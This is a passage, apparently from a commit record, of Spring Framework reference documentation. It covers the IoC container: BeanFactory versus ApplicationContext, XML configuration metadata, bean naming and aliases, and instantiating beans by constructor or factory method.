`DisposableBean`, are still present in\nSpring for the purposes of backward compatibility with the large number of third-party\nframeworks that integrate with Spring. Often third-party components that can not use\nmore modern equivalents such as `@PostConstruct` or `@PreDestroy` in order to remain\ncompatible with JDK 1.4 or to avoid a dependency on JSR-250.\n\nThis section provides additional background into the differences between the\n`BeanFactory` and `ApplicationContext` and how one might access the IoC container\ndirectly through a classic singleton lookup.\n\n\n\n[[context-introduction-ctx-vs-beanfactory]]\n=== BeanFactory or ApplicationContext?\n\nUse an `ApplicationContext` unless you have a good reason for not doing so.\n\nBecause the `ApplicationContext` includes all functionality of the `BeanFactory`, it is\ngenerally recommended over the `BeanFactory`, except for a few situations such as in\nembedded applications running on resource-constrained devices where memory consumption\nmight be critical and a few extra kilobytes might make a difference. However, for\nmost typical enterprise applications and systems, the `ApplicationContext` is what you\nwill want to use. Spring makes __heavy__ use of the <<beans-factory-extension-bpp,\n`BeanPostProcessor` extension point>> (to effect proxying and so on). If you use only a\nplain `BeanFactory`, a fair amount of support such as transactions and AOP will not take\neffect, at least not without some extra steps on your part. This situation could be\nconfusing because nothing is actually wrong with the configuration.\n\nThe following table lists features provided by the `BeanFactory` and\n`ApplicationContext` interfaces and implementations.\n\n[[context-introduction-ctx-vs-beanfactory-feature-matrix]]\n.Feature Matrix\n|===\n| Feature| `BeanFactory`| `ApplicationContext`\n\n| Bean instantiation\/wiring\n| Yes\n| Yes\n\n| Automatic `BeanPostProcessor` registration\n| No\n| Yes\n\n| Automatic `BeanFactoryPostProcessor` registration\n| No\n| Yes\n\n| Convenient `MessageSource` access (for i18n)\n| No\n| Yes\n\n| `ApplicationEvent` publication\n| No\n| Yes\n|===\n\nTo explicitly register a bean post-processor with a `BeanFactory` implementation,\nyou need to write code like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tDefaultListableBeanFactory factory = new DefaultListableBeanFactory();\n\t\/\/ populate the factory with bean definitions\n\n\t\/\/ now register any needed BeanPostProcessor instances\n\tMyBeanPostProcessor postProcessor = new MyBeanPostProcessor();\n\tfactory.addBeanPostProcessor(postProcessor);\n\n\t\/\/ now start using the factory\n----\n\nTo explicitly register a `BeanFactoryPostProcessor` when using a `BeanFactory`\nimplementation, you must write code like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tDefaultListableBeanFactory factory = new DefaultListableBeanFactory();\n\tXmlBeanDefinitionReader reader = new XmlBeanDefinitionReader(factory);\n\treader.loadBeanDefinitions(new FileSystemResource(\"beans.xml\"));\n\n\t\/\/ bring in some property values from a Properties file\n\tPropertyPlaceholderConfigurer cfg = new PropertyPlaceholderConfigurer();\n\tcfg.setLocation(new FileSystemResource(\"jdbc.properties\"));\n\n\t\/\/ now actually do the replacement\n\tcfg.postProcessBeanFactory(factory);\n----\n\nIn both cases, the explicit registration step is inconvenient, which is one reason why\nthe various `ApplicationContext` implementations are preferred above plain `BeanFactory`\nimplementations in the vast majority of Spring-backed applications, especially when\nusing ``BeanFactoryPostProcessor``s and ``BeanPostProcessor``s. These mechanisms implement\nimportant functionality such as property placeholder replacement and AOP.\n\n\n\n[[beans-servicelocator]]\n=== Glue code and the evil singleton\n\nIt is best to write most application code in a dependency-injection (DI) style, where\nthat code is served out of a Spring IoC container, has its own dependencies supplied by\nthe container when it is created, and is completely unaware of the container. However,\nfor the small glue layers of code that are sometimes needed to tie other code together,\nyou sometimes need a singleton (or quasi-singleton) style access to a Spring IoC\ncontainer. For example, third-party code may try to construct new objects directly (\n`Class.forName()` style), without the ability to get these objects out of a Spring IoC\ncontainer.If the object constructed by the third-party code is a small stub or proxy,\nwhich then uses a singleton style access to a Spring IoC container to get a real object\nto delegate to, then inversion of control has still been achieved for the majority of\nthe code (the object coming out of the container). Thus most code is still unaware of\nthe container or how it is accessed, and remains decoupled from other code, with all\nensuing benefits. EJBs may also use this stub\/proxy approach to delegate to a plain Java\nimplementation object, retrieved from a Spring IoC container. While the Spring IoC\ncontainer itself ideally does not have to be a singleton, it may be unrealistic in terms\nof memory usage or initialization times (when using beans in the Spring IoC container\nsuch as a Hibernate `SessionFactory`) for each bean to use its own, non-singleton Spring\nIoC container.\n\nLooking up the application context in a service locator style is sometimes the only\noption for accessing shared Spring-managed components, such as in an EJB 2.1\nenvironment, or when you want to share a single ApplicationContext as a parent to\nWebApplicationContexts across WAR files. In this case you should look into using the\nutility class\n{api-spring-framework}\/context\/access\/ContextSingletonBeanFactoryLocator.html[`ContextSingletonBeanFactoryLocator`]\nlocator that is described in this\nhttps:\/\/spring.io\/blog\/2007\/06\/11\/using-a-shared-parent-application-context-in-a-multi-war-spring-application\/[Spring\nteam blog entry].\n","old_contents":"[[beans]]\n= The IoC container\n\n\n[[beans-introduction]]\n== Introduction to the Spring IoC container and beans\nThis chapter covers the Spring Framework implementation of the Inversion of Control\n(IoC) footnote:[See pass:specialcharacters,macros[<<background-ioc>>] ] principle. IoC\nis also known as __dependency injection__ (DI). It is a process whereby objects define\ntheir dependencies, that is, the other objects they work with, only through constructor\narguments, arguments to a factory method, or properties that are set on the object\ninstance after it is constructed or returned from a factory method. The container then\n__injects__ those dependencies when it creates the bean. This process is fundamentally\nthe inverse, hence the name __Inversion of Control__ (IoC), of the bean itself\ncontrolling the instantiation or location of its dependencies by using direct\nconstruction of classes, or a mechanism such as the __Service Locator__ pattern.\n\nThe `org.springframework.beans` and `org.springframework.context` packages are the basis\nfor Spring Framework's IoC container. The\n{api-spring-framework}\/beans\/factory\/BeanFactory.html[`BeanFactory`]\ninterface provides an advanced configuration mechanism capable of managing any type of\nobject.\n{api-spring-framework}\/context\/ApplicationContext.html[`ApplicationContext`]\nis a sub-interface of `BeanFactory`. It adds easier integration with Spring's AOP\nfeatures; message resource handling (for use in internationalization), event\npublication; and application-layer specific contexts such as the `WebApplicationContext`\nfor use in web applications.\n\nIn short, the `BeanFactory` provides the configuration framework and basic\nfunctionality, and the `ApplicationContext` adds more enterprise-specific functionality.\nThe `ApplicationContext` is a complete superset of the `BeanFactory`, and is used\nexclusively in this chapter in descriptions of Spring's IoC container. For more\ninformation on using the `BeanFactory` instead of the `ApplicationContext,` refer to\n<<beans-beanfactory>>.\n\nIn Spring, the objects that form the backbone of your application and that are managed\nby the Spring IoC __container__ are called __beans__. A bean is an object that is\ninstantiated, assembled, and otherwise managed by a Spring IoC container. Otherwise, a\nbean is simply one of many objects in your application. Beans, and the __dependencies__\namong them, are reflected in the __configuration metadata__ used by a container.\n\n\n\n\n[[beans-basics]]\n== Container overview\nThe interface `org.springframework.context.ApplicationContext` represents the Spring IoC\ncontainer and is responsible for instantiating, configuring, and assembling the\naforementioned beans. The container gets its instructions on what objects to\ninstantiate, configure, and assemble by reading configuration metadata. The\nconfiguration metadata is represented in XML, Java annotations, or Java code. It allows\nyou to express the objects that compose your application and the rich interdependencies\nbetween such objects.\n\nSeveral implementations of the `ApplicationContext` interface are supplied\nout-of-the-box with Spring. In standalone applications it is common to create an\ninstance of\n{api-spring-framework}\/context\/support\/ClassPathXmlApplicationContext.html[`ClassPathXmlApplicationContext`]\nor {api-spring-framework}\/context\/support\/FileSystemXmlApplicationContext.html[`FileSystemXmlApplicationContext`].\n While XML has been the traditional format for defining configuration metadata you can\ninstruct the container to use Java annotations or code as the metadata format by\nproviding a small amount of XML configuration to declaratively enable support for these\nadditional metadata formats.\n\nIn most application scenarios, explicit user code is not required to instantiate one or\nmore instances of a Spring IoC container. For example, in a web application scenario, a\nsimple eight (or so) lines of boilerplate web descriptor XML in the `web.xml` file\nof the application will typically suffice (see <<context-create>>). If you are using the\nhttps:\/\/spring.io\/tools\/sts[Spring Tool Suite] Eclipse-powered development\nenvironment this boilerplate configuration can be easily created with few mouse clicks or\nkeystrokes.\n\nThe following diagram is a high-level view of how Spring works. Your application classes\nare combined with configuration metadata so that after the `ApplicationContext` is\ncreated and initialized, you have a fully configured and executable system or\napplication.\n\n.The Spring IoC container\nimage::images\/container-magic.png[width=250]\n\n\n\n[[beans-factory-metadata]]\n=== Configuration metadata\n\nAs the preceding diagram shows, the Spring IoC container consumes a form of\n__configuration metadata__; this configuration metadata represents how you as an\napplication developer tell the Spring container to instantiate, configure, and assemble\nthe objects in your application.\n\nConfiguration metadata is traditionally supplied in a simple and intuitive XML format,\nwhich is what most of this chapter uses to convey key concepts and features of the\nSpring IoC container.\n\n[NOTE]\n====\nXML-based metadata is __not__ the only allowed form of configuration metadata. The\nSpring IoC container itself is __totally__ decoupled from the format in which this\nconfiguration metadata is actually written. These days many developers choose\n<<beans-java,Java-based configuration>> for their Spring applications.\n====\n\nFor information about using other forms of metadata with the Spring container, see:\n\n* <<beans-annotation-config,Annotation-based configuration>>: Spring 2.5 introduced\n support for annotation-based configuration metadata.\n* <<beans-java,Java-based configuration>>: Starting with Spring 3.0, many features\n provided by the Spring JavaConfig project became part of the core Spring Framework.\n Thus you can define beans external to your application classes by using Java rather\n than XML files. To use these new features, see the `@Configuration`, `@Bean`, `@Import`\n and `@DependsOn` annotations.\n\nSpring configuration consists of at least one and typically more than one bean\ndefinition that the container must manage. XML-based configuration metadata shows these\nbeans configured as `<bean\/>` elements inside a top-level `<beans\/>` element. Java\nconfiguration typically uses `@Bean` annotated methods within a `@Configuration` class.\n\nThese bean definitions correspond to the actual objects that make up your application.\nTypically you define service layer objects, data access objects (DAOs), presentation\nobjects such as Struts `Action` instances, infrastructure objects such as Hibernate\n`SessionFactories`, JMS `Queues`, and so forth. Typically one does not configure\nfine-grained domain objects in the container, because it is usually the responsibility\nof DAOs and business logic to create and load domain objects. However, you can use\nSpring's integration with AspectJ to configure objects that have been created outside\nthe control of an IoC container. See <<aop-atconfigurable,Using AspectJ to\ndependency-inject domain objects with Spring>>.\n\nThe following example shows the basic structure of XML-based configuration metadata:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<bean id=\"...\" class=\"...\">\n\t\t\t<!-- collaborators and configuration for this bean go here -->\n\t\t<\/bean>\n\n\t\t<bean id=\"...\" class=\"...\">\n\t\t\t<!-- collaborators and configuration for this bean go here -->\n\t\t<\/bean>\n\n\t\t<!-- more bean definitions go here -->\n\n\t<\/beans>\n----\n\nThe `id` attribute is a string that you use to identify the individual bean definition.\nThe `class` attribute defines the type of the bean and uses the fully qualified\nclassname. The value of the id attribute refers to collaborating objects. The XML for\nreferring to collaborating objects is not shown in this example; see\n<<beans-dependencies,Dependencies>> for more information.\n\n\n\n[[beans-factory-instantiation]]\n=== Instantiating a container\n\nInstantiating a Spring IoC container is straightforward. The location path or paths\nsupplied to an `ApplicationContext` constructor are actually resource strings that allow\nthe container to load configuration metadata from a variety of external resources such\nas the local file system, from the Java `CLASSPATH`, and so on.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tApplicationContext context =\n\t\tnew ClassPathXmlApplicationContext(new String[] {\"services.xml\", \"daos.xml\"});\n----\n\n[NOTE]\n====\nAfter you learn about Spring's IoC container, you may want to know more about Spring's\n`Resource` abstraction, as described in <<resources>>, which provides a convenient\nmechanism for reading an InputStream from locations defined in a URI syntax. In\nparticular, `Resource` paths are used to construct applications contexts as described in\n<<resources-app-ctx>>.\n====\n\nThe following example shows the service layer objects `(services.xml)` configuration file:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<!-- services -->\n\n\t\t<bean id=\"petStore\" class=\"org.springframework.samples.jpetstore.services.PetStoreServiceImpl\">\n\t\t\t<property name=\"accountDao\" ref=\"accountDao\"\/>\n\t\t\t<property name=\"itemDao\" ref=\"itemDao\"\/>\n\t\t\t<!-- additional collaborators and configuration for this bean go here -->\n\t\t<\/bean>\n\n\t\t<!-- more bean definitions for services go here -->\n\n\t<\/beans>\n----\n\nThe following example shows the data access objects `daos.xml` file:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<bean id=\"accountDao\"\n\t\t\tclass=\"org.springframework.samples.jpetstore.dao.jpa.JpaAccountDao\">\n\t\t\t<!-- additional collaborators and configuration for this bean go here -->\n\t\t<\/bean>\n\n\t\t<bean id=\"itemDao\" class=\"org.springframework.samples.jpetstore.dao.jpa.JpaItemDao\">\n\t\t\t<!-- additional collaborators and configuration for this bean go here -->\n\t\t<\/bean>\n\n\t\t<!-- more bean definitions for data access objects go here -->\n\n\t<\/beans>\n----\n\nIn the preceding example, the service layer consists of the class `PetStoreServiceImpl`,\nand two data access objects of the type `JpaAccountDao` and `JpaItemDao` (based\non the JPA Object\/Relational mapping standard). The `property name` element refers to the\nname of the JavaBean property, and the `ref` element refers to the name of another bean\ndefinition. This linkage between `id` and `ref` elements expresses the dependency between\ncollaborating objects. For details of configuring an object's dependencies, see\n<<beans-dependencies,Dependencies>>.\n\n\n[[beans-factory-xml-import]]\n==== Composing XML-based configuration metadata\n\nIt can be useful to have bean definitions span multiple XML files. Often each individual\nXML configuration file represents a logical layer or module in your architecture.\n\nYou can use the application context constructor to load bean definitions from all these\nXML fragments. This constructor takes multiple `Resource` locations, as was shown in the\nprevious section. Alternatively, use one or more occurrences of the `<import\/>` element\nto load bean definitions from another file or files. For example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<import resource=\"services.xml\"\/>\n\t\t<import resource=\"resources\/messageSource.xml\"\/>\n\t\t<import resource=\"\/resources\/themeSource.xml\"\/>\n\n\t\t<bean id=\"bean1\" class=\"...\"\/>\n\t\t<bean id=\"bean2\" class=\"...\"\/>\n\t<\/beans>\n----\n\nIn the preceding example, external bean definitions are loaded from three files:\n`services.xml`, `messageSource.xml`, and `themeSource.xml`. All location paths are\nrelative to the definition file doing the importing, so `services.xml` must be in the\nsame directory or classpath location as the file doing the importing, while\n`messageSource.xml` and `themeSource.xml` must be in a `resources` location below the\nlocation of the importing file. As you can see, a leading slash is ignored, but given\nthat these paths are relative, it is better form not to use the slash at all. The\ncontents of the files being imported, including the top level `<beans\/>` element, must\nbe valid XML bean definitions according to the Spring Schema.\n\n[NOTE]\n====\nIt is possible, but not recommended, to reference files in parent directories using a\nrelative \"..\/\" path. Doing so creates a dependency on a file that is outside the current\napplication. In particular, this reference is not recommended for \"classpath:\" URLs (for\nexample, \"classpath:..\/services.xml\"), where the runtime resolution process chooses the\n\"nearest\" classpath root and then looks into its parent directory. Classpath\nconfiguration changes may lead to the choice of a different, incorrect directory.\n\nYou can always use fully qualified resource locations instead of relative paths: for\nexample, \"file:C:\/config\/services.xml\" or \"classpath:\/config\/services.xml\". However, be\naware that you are coupling your application's configuration to specific absolute\nlocations. It is generally preferable to keep an indirection for such absolute\nlocations, for example, through \"${...}\" placeholders that are resolved against JVM\nsystem properties at runtime.\n====\n\n\n\n[[beans-factory-client]]\n=== Using the container\n\nThe `ApplicationContext` is the interface for an advanced factory capable of maintaining\na registry of different beans and their dependencies. Using the method `T getBean(String\nname, Class<T> requiredType)` you can retrieve instances of your beans.\n\nThe `ApplicationContext` enables you to read bean definitions and access them as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ create and configure beans\n\tApplicationContext context =\n\t\tnew ClassPathXmlApplicationContext(new String[] {\"services.xml\", \"daos.xml\"});\n\n\t\/\/ retrieve configured instance\n\tPetStoreService service = context.getBean(\"petStore\", PetStoreService.class);\n\n\t\/\/ use configured instance\n\tList<String> userList = service.getUsernameList();\n----\n\nYou use `getBean()` to retrieve instances of your beans. The `ApplicationContext`\ninterface has a few other methods for retrieving beans, but ideally your application\ncode should never use them. Indeed, your application code should have no calls to the\n`getBean()` method at all, and thus no dependency on Spring APIs at all. For example,\nSpring's integration with web frameworks provides for dependency injection for various\nweb framework classes such as controllers and JSF-managed beans.\n\n\n\n\n[[beans-definition]]\n== Bean overview\nA Spring IoC container manages one or more __beans__. These beans are created with the\nconfiguration metadata that you supply to the container, for example, in the form of XML\n`<bean\/>` definitions.\n\nWithin the container itself, these bean definitions are represented as `BeanDefinition`\nobjects, which contain (among other information) the following metadata:\n\n* __A package-qualified class name:__ typically the actual implementation class of the\n bean being defined.\n* Bean behavioral configuration elements, which state how the bean should behave in the\n container (scope, lifecycle callbacks, and so forth).\n* References to other beans that are needed for the bean to do its work; these\n references are also called __collaborators__ or __dependencies__.\n* Other configuration settings to set in the newly created object, for example, the\n number of connections to use in a bean that manages a connection pool, or the size\n limit of the pool.\n\nThis metadata translates to a set of properties that make up each bean definition.\n\n[[beans-factory-bean-definition-tbl]]\n.The bean definition\n|===\n| Property| Explained in...\n\n| class\n| <<beans-factory-class>>\n\n| name\n| <<beans-beanname>>\n\n| scope\n| <<beans-factory-scopes>>\n\n| constructor arguments\n| <<beans-factory-collaborators>>\n\n| properties\n| <<beans-factory-collaborators>>\n\n| autowiring mode\n| <<beans-factory-autowire>>\n\n| lazy-initialization mode\n| <<beans-factory-lazy-init>>\n\n| initialization method\n| <<beans-factory-lifecycle-initializingbean>>\n\n| destruction method\n| <<beans-factory-lifecycle-disposablebean>>\n|===\n\nIn addition to bean definitions that contain information on how to create a specific\nbean, the `ApplicationContext` implementations also permit the registration of existing\nobjects that are created outside the container, by users. This is done by accessing the\nApplicationContext's BeanFactory via the method `getBeanFactory()` which returns the\nBeanFactory implementation `DefaultListableBeanFactory`. `DefaultListableBeanFactory`\nsupports this registration through the methods `registerSingleton(..)` and\n`registerBeanDefinition(..)`. However, typical applications work solely with beans\ndefined through metadata bean definitions.\n\n[NOTE]\n====\nBean metadata and manually supplied singleton instances need to be registered as early\nas possible, in order for the container to properly reason about them during autowiring\nand other introspection steps. While overriding of existing metadata and existing\nsingleton instances is supported to some degree, the registration of new beans at\nruntime (concurrently with live access to factory) is not officially supported and may\nlead to concurrent access exceptions and\/or inconsistent state in the bean container.\n====\n\n\n\n[[beans-beanname]]\n=== Naming beans\n\nEvery bean has one or more identifiers. These identifiers must be unique within the\ncontainer that hosts the bean. A bean usually has only one identifier, but if it\nrequires more than one, the extra ones can be considered aliases.\n\nIn XML-based configuration metadata, you use the `id` and\/or `name` attributes\nto specify the bean identifier(s). The `id` attribute allows you to specify\nexactly one id. Conventionally these names are alphanumeric ('myBean',\n'fooService', etc.), but may contain special characters as well. If you want to\nintroduce other aliases to the bean, you can also specify them in the `name`\nattribute, separated by a comma (`,`), semicolon (`;`), or white space. As a\nhistorical note, in versions prior to Spring 3.1, the `id` attribute was\ndefined as an `xsd:ID` type, which constrained possible characters. As of 3.1,\nit is defined as an `xsd:string` type. Note that bean `id` uniqueness is still\nenforced by the container, though no longer by XML parsers.\n\nYou are not required to supply a name or id for a bean. If no name or id is supplied\nexplicitly, the container generates a unique name for that bean. However, if you want to\nrefer to that bean by name, through the use of the `ref` element or\n<<beans-servicelocator,Service Locator>> style lookup, you must provide a name.\nMotivations for not supplying a name are related to using <<beans-inner-beans,inner\nbeans>> and <<beans-factory-autowire,autowiring collaborators>>.\n\n.Bean Naming Conventions\n****\nThe convention is to use the standard Java convention for instance field names when\nnaming beans. That is, bean names start with a lowercase letter, and are camel-cased\nfrom then on. Examples of such names would be (without quotes) `'accountManager'`,\n`'accountService'`, `'userDao'`, `'loginController'`, and so forth.\n\nNaming beans consistently makes your configuration easier to read and understand, and if\nyou are using Spring AOP it helps a lot when applying advice to a set of beans related\nby name.\n****\n\n[NOTE]\n====\nWith component scanning in the classpath, Spring generates bean names for unnamed\ncomponents, following the rules above: essentially, taking the simple class name\nand turning its initial character to lower-case. However, in the (unusual) special\ncase when there is more than one character and both the first and second characters\nare upper case, the original casing gets preserved. These are the same rules as\ndefined by `java.beans.Introspector.decapitalize` (which Spring is using here).\n====\n\n\n[[beans-beanname-alias]]\n==== Aliasing a bean outside the bean definition\n\nIn a bean definition itself, you can supply more than one name for the bean, by using a\ncombination of up to one name specified by the `id` attribute, and any number of other\nnames in the `name` attribute. These names can be equivalent aliases to the same bean,\nand are useful for some situations, such as allowing each component in an application to\nrefer to a common dependency by using a bean name that is specific to that component\nitself.\n\nSpecifying all aliases where the bean is actually defined is not always adequate,\nhowever. It is sometimes desirable to introduce an alias for a bean that is defined\nelsewhere. This is commonly the case in large systems where configuration is split\namongst each subsystem, each subsystem having its own set of object definitions. In\nXML-based configuration metadata, you can use the `<alias\/>` element to accomplish this.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<alias name=\"fromName\" alias=\"toName\"\/>\n----\n\nIn this case, a bean in the same container which is named `fromName`, may also,\nafter the use of this alias definition, be referred to as `toName`.\n\nFor example, the configuration metadata for subsystem A may refer to a DataSource via\nthe name `subsystemA-dataSource`. The configuration metadata for subsystem B may refer to\na DataSource via the name `subsystemB-dataSource`. When composing the main application\nthat uses both these subsystems the main application refers to the DataSource via the\nname `myApp-dataSource`. To have all three names refer to the same object you add to the\nMyApp configuration metadata the following aliases definitions:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<alias name=\"subsystemA-dataSource\" alias=\"subsystemB-dataSource\"\/>\n\t<alias name=\"subsystemA-dataSource\" alias=\"myApp-dataSource\" \/>\n----\n\nNow each component and the main application can refer to the dataSource through a name\nthat is unique and guaranteed not to clash with any other definition (effectively\ncreating a namespace), yet they refer to the same bean.\n\n.Java-configuration\n****\nIf you are using Java-configuration, the `@Bean` annotation can be used to provide aliases\nsee <<beans-java-bean-annotation>> for details.\n****\n\n[[beans-factory-class]]\n=== Instantiating beans\n\nA bean definition essentially is a recipe for creating one or more objects. The\ncontainer looks at the recipe for a named bean when asked, and uses the configuration\nmetadata encapsulated by that bean definition to create (or acquire) an actual object.\n\nIf you use XML-based configuration metadata, you specify the type (or class) of object\nthat is to be instantiated in the `class` attribute of the `<bean\/>` element. This\n`class` attribute, which internally is a `Class` property on a `BeanDefinition`\ninstance, is usually mandatory. (For exceptions, see\n<<beans-factory-class-instance-factory-method>> and <<beans-child-bean-definitions>>.)\nYou use the `Class` property in one of two ways:\n\n* Typically, to specify the bean class to be constructed in the case where the container\n itself directly creates the bean by calling its constructor reflectively, somewhat\n equivalent to Java code using the `new` operator.\n* To specify the actual class containing the `static` factory method that will be\n invoked to create the object, in the less common case where the container invokes a\n `static` __factory__ method on a class to create the bean. The object type returned\n from the invocation of the `static` factory method may be the same class or another\n class entirely.\n\n****\n.Inner class names\nIf you want to configure a bean definition for a `static` nested class, you have to use\nthe __binary__ name of the nested class.\n\nFor example, if you have a class called `Foo` in the `com.example` package, and this\n`Foo` class has a `static` nested class called `Bar`, the value of the `'class'`\nattribute on a bean definition would be...\n\n`com.example.Foo$Bar`\n\nNotice the use of the `$` character in the name to separate the nested class name from\nthe outer class name.\n****\n\n\n[[beans-factory-class-ctor]]\n==== Instantiation with a constructor\n\nWhen you create a bean by the constructor approach, all normal classes are usable by and\ncompatible with Spring. That is, the class being developed does not need to implement\nany specific interfaces or to be coded in a specific fashion. Simply specifying the bean\nclass should suffice. However, depending on what type of IoC you use for that specific\nbean, you may need a default (empty) constructor.\n\nThe Spring IoC container can manage virtually __any__ class you want it to manage; it is\nnot limited to managing true JavaBeans. Most Spring users prefer actual JavaBeans with\nonly a default (no-argument) constructor and appropriate setters and getters modeled\nafter the properties in the container. You can also have more exotic non-bean-style\nclasses in your container. If, for example, you need to use a legacy connection pool\nthat absolutely does not adhere to the JavaBean specification, Spring can manage it as\nwell.\n\nWith XML-based configuration metadata you can specify your bean class as follows:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\"\/>\n\n\t<bean name=\"anotherExample\" class=\"examples.ExampleBeanTwo\"\/>\n----\n\nFor details about the mechanism for supplying arguments to the constructor (if required)\nand setting object instance properties after the object is constructed, see\n<<beans-factory-collaborators,Injecting Dependencies>>.\n\n\n[[beans-factory-class-static-factory-method]]\n==== Instantiation with a static factory method\n\nWhen defining a bean that you create with a static factory method, you use the `class`\nattribute to specify the class containing the `static` factory method and an attribute\nnamed `factory-method` to specify the name of the factory method itself. You should be\nable to call this method (with optional arguments as described later) and return a live\nobject, which subsequently is treated as if it had been created through a constructor.\nOne use for such a bean definition is to call `static` factories in legacy code.\n\nThe following bean definition specifies that the bean will be created by calling a\nfactory-method. The definition does not specify the type (class) of the returned object,\nonly the class containing the factory method. In this example, the `createInstance()`\nmethod must be a __static__ method.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"clientService\"\n\t\tclass=\"examples.ClientService\"\n\t\tfactory-method=\"createInstance\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ClientService {\n\t\tprivate static ClientService clientService = new ClientService();\n\t\tprivate ClientService() {}\n\n\t\tpublic static ClientService createInstance() {\n\t\t\treturn clientService;\n\t\t}\n\t}\n----\n\nFor details about the mechanism for supplying (optional) arguments to the factory method\nand setting object instance properties after the object is returned from the factory,\nsee <<beans-factory-properties-detailed,Dependencies and configuration in detail>>.\n\n\n[[beans-factory-class-instance-factory-method]]\n==== Instantiation using an instance factory method\n\nSimilar to instantiation through a <<beans-factory-class-static-factory-method,static\nfactory method>>, instantiation with an instance factory method invokes a non-static\nmethod of an existing bean from the container to create a new bean. To use this\nmechanism, leave the `class` attribute empty, and in the `factory-bean` attribute,\nspecify the name of a bean in the current (or parent\/ancestor) container that contains\nthe instance method that is to be invoked to create the object. Set the name of the\nfactory method itself with the `factory-method` attribute.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- the factory bean, which contains a method called createInstance() -->\n\t<bean id=\"serviceLocator\" class=\"examples.DefaultServiceLocator\">\n\t\t<!-- inject any dependencies required by this locator bean -->\n\t<\/bean>\n\n\t<!-- the bean to be created via the factory bean -->\n\t<bean id=\"clientService\"\n\t\tfactory-bean=\"serviceLocator\"\n\t\tfactory-method=\"createClientServiceInstance\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class DefaultServiceLocator {\n\n\t\tprivate static ClientService clientService = new ClientServiceImpl();\n\t\tprivate DefaultServiceLocator() {}\n\n\t\tpublic ClientService createClientServiceInstance() {\n\t\t\treturn clientService;\n\t\t}\n\t}\n----\n\nOne factory class can also hold more than one factory method as shown here:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"serviceLocator\" class=\"examples.DefaultServiceLocator\">\n\t\t<!-- inject any dependencies required by this locator bean -->\n\t<\/bean>\n\n\t<bean id=\"clientService\"\n\t\tfactory-bean=\"serviceLocator\"\n\t\tfactory-method=\"createClientServiceInstance\"\/>\n\n\t<bean id=\"accountService\"\n\t\tfactory-bean=\"serviceLocator\"\n\t\tfactory-method=\"createAccountServiceInstance\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class DefaultServiceLocator {\n\n\t\tprivate static ClientService clientService = new ClientServiceImpl();\n\t\tprivate static AccountService accountService = new AccountServiceImpl();\n\n\t\tprivate DefaultServiceLocator() {}\n\n\t\tpublic ClientService createClientServiceInstance() {\n\t\t\treturn clientService;\n\t\t}\n\n\t\tpublic AccountService createAccountServiceInstance() {\n\t\t\treturn accountService;\n\t\t}\n\n\t}\n----\n\nThis approach shows that the factory bean itself can be managed and configured through\ndependency injection (DI). See <<beans-factory-properties-detailed,Dependencies and\nconfiguration in detail>>.\n\n[NOTE]\n====\nIn Spring documentation,__ factory bean__ refers to a bean that is configured in the\nSpring container that will create objects through an\n<<beans-factory-class-instance-factory-method,instance>> or\n<<beans-factory-class-static-factory-method,static>> factory method. By contrast,\n`FactoryBean` (notice the capitalization) refers to a Spring-specific\n<<beans-factory-extension-factorybean, `FactoryBean` >>.\n====\n\n\n\n\n[[beans-dependencies]]\n== Dependencies\nA typical enterprise application does not consist of a single object (or bean in the\nSpring parlance). Even the simplest application has a few objects that work together to\npresent what the end-user sees as a coherent application. This next section explains how\nyou go from defining a number of bean definitions that stand alone to a fully realized\napplication where objects collaborate to achieve a goal.\n\n\n\n[[beans-factory-collaborators]]\n=== Dependency Injection\n\n__Dependency injection__ (DI) is a process whereby objects define their dependencies,\nthat is, the other objects they work with, only through constructor arguments, arguments\nto a factory method, or properties that are set on the object instance after it is\nconstructed or returned from a factory method. The container then __injects__ those\ndependencies when it creates the bean. This process is fundamentally the inverse, hence\nthe name __Inversion of Control__ (IoC), of the bean itself controlling the instantiation\nor location of its dependencies on its own by using direct construction of classes, or\nthe __Service Locator__ pattern.\n\nCode is cleaner with the DI principle and decoupling is more effective when objects are\nprovided with their dependencies. The object does not 